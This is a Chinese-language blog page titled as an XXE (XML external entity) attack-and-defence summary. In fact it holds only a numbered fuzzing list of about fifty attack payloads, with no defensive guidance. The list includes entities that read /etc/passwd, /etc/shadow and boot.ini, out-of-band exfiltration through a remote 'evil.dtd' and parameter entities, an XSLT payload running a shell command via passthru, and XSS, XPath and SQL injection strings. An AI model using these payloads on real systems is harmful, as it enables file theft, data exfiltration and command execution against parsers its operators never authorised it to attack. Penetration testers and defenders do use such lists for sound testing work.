XXE(XML外部实体注入)攻防整理

XML 2020-09-13

Fuzzing

 1 <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" >
 2 <?xml version="1.0" encoding="ISO-8859-1"?>
 3 <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
 4 <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
 5 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>
 6 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>
 7 <?xml version="1.0" encoding="ISO-8859-1"?><test></test>
 8 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
 9 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
10 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo>
11 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]>
12 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
13 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
14 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
15 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
16 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo>
17 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]>
18 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
19 <test></test>
20 <![CDATA[<test></test>]]>
21 &foo;
22 %foo;
23 count(/child::node())
24 x or name()=username or x=y
25 <name>,‘‘)); phpinfo(); exit;/*</name>
26 <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
27 <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(XSS);<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
28 <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(XSS);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
29 <foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(XSS);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
30 <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[ or 1=1 or ‘‘=]]></foo>
31 <foo><![CDATA[ or 1=1 or ‘‘=]]></foo>
32 <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(‘XSS‘);">]]>
33 <xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert(‘XSS‘)"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
34 <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
35 <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
36 <xml SRC="xsstest.xml" ID=I></xml>
37 <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
38 <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
39 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet>
40 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document(‘/etc/passwd‘)"/></xsl:template></xsl:stylesheet>
41 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function(‘passthru‘,‘ls -la‘)"/></xsl:template></xsl:stylesheet>
42 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
43 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
44 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
45 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]>
46 <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]>
47 <!ENTITY % int "<!ENTITY &#37; trick SYSTEM ‘http://127.0.0.1:80/?%file;‘>  "> %int;
48 <!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM ‘ftp://127.0.0.1:21/%data3;‘>">
49 <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
50 <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]>
51 <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>

相关文章

php输出xml格式字符串
php输出xml格式字符串
J2ME Mobile 3D入门教程系列文章之一
J2ME Mobile 3D入门教程系列文章之一
XML轻松学习手册
XML轻松学习手册
XML入门的常见问题(一)
XML入门的常见问题(一)
XML入门的常见问题(三)
XML入门的常见问题(三)
XML轻松学习手册(2)XML概念
XML轻松学习手册(2)XML概念